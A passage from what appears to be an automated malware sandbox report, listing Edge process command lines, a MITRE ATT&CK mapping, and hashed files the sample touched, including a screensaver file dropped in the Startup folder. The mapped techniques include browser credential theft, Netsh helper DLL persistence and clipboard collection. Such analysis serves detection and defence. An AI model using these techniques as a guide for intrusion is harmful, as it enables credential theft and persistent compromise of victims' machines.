  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:1420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
  2⤵
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5156 /prefetch:2
  2⤵
  PID:5888

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1064

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ .scr

Filesize
6.9MB

MD5
feae9beea405e210c9734b7c682a9fb4

SHA1
0a7cc64b5255b58752f81869dc4ef84a95cd8df5

SHA256
7690f96c2c52dae73c9d1e941f3f2fea3350664b8074e0958f64cc704c65527b

SHA512
354524a145d20751455c91d3a7a4ce5cdb40bae220f77fdc199fcbc90c48568ea9b20db72bde694e687d395fa0a66fd61eab5910f4ea2d8fa981462a712a1e1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\776b9e07-a29e-4a41-8f15-f6ce8dd1bf27.tmp

Filesize
9KB

MD5
865f35a3814db71aaea4e2c1b26790bd

SHA1
14e02089392cb3815226a101bad45afccb2b4eef

SHA256
ea57eaff79d7b85cb9a0c44a5c31b02f5a792dd81a175d45f4a3a9f65f224322

SHA512
94ac248a0906e824dc9cab9be279253154015f912a4dbc44f03f1a69970b9333aeb87f7fd75fb10f3990642addae52a8c5353411cfec96c7e1fcb6779066de27

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
c91183c39f1cc730e9948ca7f60d33cc

SHA1
ee23e81cefe1fc38661fe3732d3717d683878cd8

SHA256
bd4e532caca3dbfae7fa82224d07c0b94781c69282006238ec82db030de20056

SHA512
be0187c5af63c28ee4b1c8dbe3730894ed754288c5d51c9cc8b9f647d4c1bfd4c44ecff99f3e16fc9b38cb0a1cd71d5b736335c2fb5369cef9a69c639b91b8ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
7f44664dc27e1c2471523d9f77af1ba6

SHA1
862431174e55b5ca381621eead0477f7f9fff883

SHA256
b445b72b7d430aafd12ab88de8324493a181aa03aea45a89b99d9b65793071cb

SHA512
c09ad6cf50933c95c7070de9bcd6d0c135da12f3cc0b5ef675fcbc68bb4605a060d7ea18c351e0b4e1ac646c950733a9247f4715b67c88e626d14a0671984433

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
2c1e83e4d92556430a77452753b55267

SHA1
c952207ab1ba5913705115ec0e8cb09e82ae281d

SHA256
16262729fba3d5fc673b2f6334ef5fc89ed54d35280c07c5283f3393c82a63e4

SHA512
36c81e82444b4927c1ae0d15babb83049c101c777e8c7cbc0a91e7dbcb01d6799f6e4555ea153b4835ef8b48b457ab64c96492d7c28d852cad19dee75a532934

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
eda1a75d1aa0ccee82eb572d31bd3b02

SHA1
3ceb7149dbe67a126f7178bd95f1ee64bc37f00c

SHA256
7f3a6400945a4c46c4d7164aac552db727896ea1db48c2d02ec2cc72a08a2263

SHA512
1a321997538b1c4cf81b907e07307cda3f57052c3c8a6e58a7fd84f3488798aa2d98916dded6af9ca5964549f9f8691bf37a60b76e7cd30977f4b57690bcba6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2b6190a61172654ef3eb0c87c5497dbd

SHA1
8d00eaf13b56346cf64c621233206e8b5147ad84

SHA256
c1867e4abd54124aeb4f5fab1c10f992c230dee6019263feddc9d438ccb0e89a

SHA512
5180a6f8f469b3fa907eebfdcc1da3a757587532882dfa49f1d35c23071050f1eaa123b3b2454d2567a2b041a623924e2d6cd0ab5e28651f75a34819bc8cd186

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
600c2addc4dc2c6c1e89051f215ba59b

SHA1
57096f4b1316cff13431029bb382815d95ac301f

SHA256
fce8308806ab7d5b1c338147cc4c07b2eaa2488caaa0b75d5c01f0b99ba53b76

SHA512
ea362c10f54f2ba1fbbad569bde638b5c30bd300bb561af996fe667fb42c39c01db5393f07e9e6971376f420701cff5e257361279bb822b9a80f905c76dcc8a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
b232fbea95e85ba96145fa6eae8e1488

SHA1
93aa9f9e4af99dd068d012ea3d92a0590ef2230b

SHA256
ba929467ff27dbf6edc7ee3991c4d0a38121302b2b0867b05df78d5430c72fd0

SHA512
07cdc370561016425fb0ffbee2c8e7f1d50628fd901be15e1e89e97e9bf43e434262b346376f6a309caca91ab0cf871a3285191ebc813f34966c0881924d70e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\df047aca-097d-41b3-9118-9ad6d6266a00.tmp

Filesize
9KB

MD5
46a65dfa945fb7415e60987f7c96988d

SHA1
bbef9bfffb72979353e19dbbebc3a152c7e31b55

SHA256
aa80d77b9098b89037dedaeb9447f55cfbb8a310f572f3203eba17d611179c0e

SHA512
c269c6f02eceed3a1522e7741e8789972307deee5bf172a3fa755285b9b6713641ba0e5ad1dd0fdc16e3777206eb9418647e3aaa902edb936411074b65c71989

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
5bfb9772ce38a8d61555e0056603cb97

SHA1
3b60a5146c4f41c0bac66858c31024eba6b5bc05

SHA256
0b0d0802dcd037943916f153557278419cdae5fd92605188ed29e31ac850987b

SHA512
cdc9857dc6d2dd4f43c07c4a95460e90e9558d20e2e122a85f081a03a08be1c2850eba5b46f58212aec4c693246fcd5e3637e8ba19d45ae35b652a02c6f1f92c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
c9cb651abadfd67cabd8f0d1e4e37110

SHA1
f9387fb4ef4da9560fffb3ec07bf7e99c4e1c27b

SHA256
3d3506cf180f553789844ba5078df70ee0d064af7c14aebb2a121db9cb456f1c

SHA512
f70d59e4c38872e75952a66d554d87b6d47fb14f4ad969cf45b954235218867fa2adfb29993d0ad7a9be10f5cde7154dfc6d56e8739e78f0c867fcc072ed3c52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
55682260d2d90fcac5e3ab91d984ebb9

SHA1
604298c55ef4f69a79486e82278094caf0dfdfde

SHA256
40e969d368e9254e0cbf890a160d8a50b85d5c8f378bb458900168fc925c8d44

SHA512
32bc16fb37a05dfea0a8528b2701cf9211c83492bf456022fc72c3bb267722d3bdb6dd513f7dc6f02cba9208df4f18ece289e1647391191ea967136cf4811261

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6aa71065-4f2c-4e01-9ec0-cf2a63c7f760.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
162KB

MD5
d2320f45999516d37d8a4a20439e21f7

SHA1
a96157c9d1222cb97ced1cf6425441d586d16cf4

SHA256
6ccf17947eb0db44789d338cf59cec7c6208bec7aa45957a4b358854d6785a0a

SHA512
092174c3006dab4a2390969b80901de251ff7990741a22daa5a03195552e5a416038317cb63cb690128a14ec0a07e7d48a154e9722613e3c201c41677a33a7b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
dfc648bb6cdf802f66b92a5e68471bf7

SHA1
059ca60a2e8f233edb860c237e5dd623ea8dc652

SHA256
9c30e54012aeec0a14e83037432dc1e88610e43828798996fb2869fcf1672498

SHA512
363cd0c323e0f641e3073a8cc6bcd554587d04eb69372f875717a6a71de27950c4431220ac0f811e8807d83a5003aed8cca962436b2ad26eaf80d72fdbe97b7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
396583db669fb18b803c8531498b2fd9

SHA1
6a45fa630116db027dfdf5828918904105706a60

SHA256
4dbc950726fddcf094efedf8cd523363fcdd98f68b504ab4a71891fd2a2c116f

SHA512
d5c5d8ebe9e0ccbc020ad5be0304d0f86121dfca4f47cf0849ecb77f9d4909616b062c347ccbe57ef4e5249c1558e47d3813097561fbf5d97cdc41af7369a505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
376e5817bdb3516788b889052db159f8

SHA1
cc06309f8031946a55d20c14e1e9ddf5a1e01268

SHA256
c496ad8b59eaedbd7d2fd32acb5d4296bf0d1f1ad5e4df191576785473a5e34b

SHA512
9cc04a0554f0bc490dabd4338e59ebaed631592b54428cdf914c5361840f36023d8a7f9a150d4f92024d73d6364aade663b1ff0652d642773c5684a41bb144e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
eb77e2dac1cf5e3752e1a6f8e84d6f28

SHA1
774080fad9d41d5c11b0bdd66b373088985acfbf

SHA256
a45310a8fc0095f1ab2be4de405567557c4499d7d3bf74ebeec1c4650e27cc21

SHA512
026aa3b5c65d38303d0af34ee0eaf8ab1eb77407eb7105bd67db63f897a9788643357a41a7503bdde0ba5ba4ac142f931097ce6f2d92b6774739e60314e5957f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bc059222bc3f3da825249cbcf4b9b5f0

SHA1
6eb83afcbf8bfa07cdd5fbc865307277d38bf1a6

SHA256
a924308290d41619003713d0cb9bc46ffa437c401786dea8863be03e646246d9

SHA512
b7f2dd752ccf7bacb63648da7f23f261f4af7956d7cc402bf55a2d6910bd2411e7878dfe208c5565139bc11dac9e5a4186afcc3e9ca30ee604bf5a83a3084888

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ef9866d5f01937b18fa7ebaaf8dc6f24

SHA1
28bbbb73a3a1a4b54216af4af51f5de44f29aa7c

SHA256
87ab6b4c77f57d5dc1408f35b1ad56fc64b86c4d211af4085f35190db6bd9268

SHA512
aa2e3793d90eca09a0f18a73912106770afd7740ee06b20747c66930e6c5239faff532188e728689f1373d5739d0ddcf75eacd5b1b518e2e53096680f5874b61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
fdee622d8aefd9d613b9958c487ed8e7

SHA1
818e36a00320e3a74a3f2adbad1fad076b75296a

SHA256
3450ffe778be0d3f23f3e31bdf66507b572551e3d96518c0b777a2172389032d

SHA512
5e80097c3f4bdf338d54052d761bac04089dcec4133685ac9f48cb022cecff957eebe9eef90a9e181dd46d7a22a34558bde576562a4a29ba063c0b6d7c553eed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
56665247b4b0ec2cb406dca45fd2ced1

SHA1
5245da8df43b019174de5dfb9fb6be0599a12d95

SHA256
45775c69f28af583a76d584f6914e6058a52b320adf2740526be7486cf889d2a

SHA512
d975c9c591e57f4dea587f72499a2481c8185c0ea625cd49ee53a27f693b2640134d29c3d2301532d26d1b35a94ce93fc9956bee8f97b5d9eaecb8cff8952b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
fc1e68286a74e041e1f53d9cb0cc8911

SHA1
15ce913d19c936c4b4cedb73348621c9df38f26d

SHA256
cf7ee76fd91ab2ab0eddf4863affc860f5cd10240a358fb02c8de732ba96bf01

SHA512
d6129f62228f8bb7a7eefd5256c49bd93950e9e818ef1169608e3406ebe5a9a10f2a30528cfb03dac40974499dcd310937ee6513a016f7cfdea28842b73dce6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
c06c2ad375cff17a33606c0875c94a33

SHA1
06c8cf219004b921db6f6908d455ebb355dd5f93

SHA256
d983eb76dcbcb2743f0f52d3dffe6010b38bb4cfa9cec58e879b9ae040207bde

SHA512
4c882ea68b5b5f638a495905b2470a391a5e083b2dccf924ad286d1dc694515d257d4ab13d2e2628a0ee6494dee6443c82e5366d38e288671f6ecf85bae2ace9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5f845bad0ec1e051825348251ddbb807

SHA1
aae21e58fbb0b4cccf4a331dabd35b551a458c16

SHA256
dafb38c165cb4dbe5f492ecec4240c9ac03dede33bc875c4068719a98e3a65e2

SHA512
4a69d42ea65ec1c1d03af312213f36d5ba871b5bf8f8c3ce6e6bd60ffcfd622dc3e4cb26a57341d71ac02100db3f5a39c946a1483e59ba798eb39394f8c98c41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
46a785108ec13c07669d327dbb177b9c

SHA1
9a0e4b0feeda3e0b5d16d05bd490423aed365f77

SHA256
5cbfa1c39abfcb1f387c76c216a41c5eeab48309735a2d81e7704d24fe9a58a3

SHA512
918e8f76aa488b2eac81ab3e69b811fdec6929e319d1aac190a7972aa4eafc65509624655627175f63c78d5623256fdfbcb0807fd5b648ecb43a6f528cd25a48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
99409dbf4c533977e4d98c93bdc8cf8d

SHA1
66adc6312f563f619196bea1044acaadf52721cd

SHA256
cbbe20b3e48da2c8520d8060c2aaa9bf28b03dad70cfddd0cb5189b896ad1fd0

SHA512
b15fdf977a65ab52c57afff57b445ea92d7f5d650e2ba042389a04fa0599616f166ed3e033a0b7db2892189b115cdc454d0f7fa6fa93b07db8e76d1541d9af35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5ab5f3.TMP

Filesize
1KB

MD5
bab7ddf5363ecc69282261473eba5b2d

SHA1
78bd16d7bdbad925c53b626612d160f0a1c24917

SHA256
3da0fc8f24ee3b7fe83f482f519768b6e02c61692cf090f00b5136469c6641be

SHA512
3f98558d2c8164bea1ae3fe426ff848c65ce7a265d504cbda7a867e26984c2256555cb9b663600006db803e69d171f9cdcd4f114bc16832ddc946b24f59bb66a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
15eae5249a043b2938d695a1ca7fea0b

SHA1
bc10857a2613c565b668c975482f2253ee1b4688

SHA256
b1d6c7a7e11823bc129d1260587db344b7891a118eb3e11d63acf22eadabb673

SHA512
1c53e64bc8388ef2236da3c551015f1f7ac271711b6f48deb4d2651fbe78fd88654b92d835d36cdfffe8b46be14143cb5619001f65bec29ae2f49c61c463665f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9d10b355c903b3466aa9f7a15be46bd8

SHA1
8e9eebe33d223d0984060e2a3412a3c64f5586c2

SHA256
8afa8d43ca5b909881b2e34198b08a23dbb2dc426aa826f0e1f1734b7ac7bb83

SHA512
b1058173222bbd9ccd1db379bb140a7431a5983be48b824de4bbddc9504d13a6ef3e9d912d4393c15b4a69fc4790b25f9842792d510b92fbc0a9fb0d717e65ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cb71eedbe36ba5fc35d9e348de3414a8

SHA1
d109afdc6e62d6ab0ca4e3f8a9903891a1865eda

SHA256
665e16b158ba3a4eda4b469d823f9139046d86684e86eb766bfe03528eb03a49

SHA512
9810c7528f1e3e4215c8a56d834725f8d8502eab0d3302684df44d87d9e2fed26a8872f1e87434a5aca560674978749bf6e6cde7c51d1361423b6cec5c5280e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
28KB

MD5
f07d66a6b8a8967d84dc4a77d30eff0e

SHA1
fb14057560c2949147ef4b109601e404452689c9

SHA256
a66969877eba3f89b992e626e72b46bdf6f6e7fbd1c105e8a9d198aebc262dce

SHA512
948e70c1b1716ee1f44424f0cdd27fad381c91c60cfd25f427d3af500ea58793fc8173aa37201a8419b7211adaa7107e15aaef42a529ee21c73bd8a815f0f290

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
32b16440fab3a1055d9c22b90935bdfb

SHA1
ee350c4a65b81468487a3660dfe4f373660b9070

SHA256
ee68b728a82fefc941eba10390d9d70f5aeb442039c901eaf9a18477761cfd35

SHA512
5a1f36ab56e25548fd2875d364cfec39830e855b89628718f786bb8158147ee6fd66f2b7477d1b57b0d8cec5b8f10d173face18f4131ecec0dc67ca9ae56216c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bb8fac255fdf306e35190710c79e3531

SHA1
7df46701509f10fc287dde930fa1e2026b51fa02

SHA256
598642439b1e50885828bb15b28a415328aaa7fa565a14fa18b16724d8a97abc

SHA512
3a6e006550dc830ded1040c446b05e522c430c3cb94b64054b1bf30ce7804f578fc5b61611d5e25eb28b0c56293928d51771e80b014c48b229ab5fd2fa5a7575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
227556da5e65f6819f477756808c17e4

SHA1
6ffce766e881ca2a60180bb25f4981b183f78279

SHA256
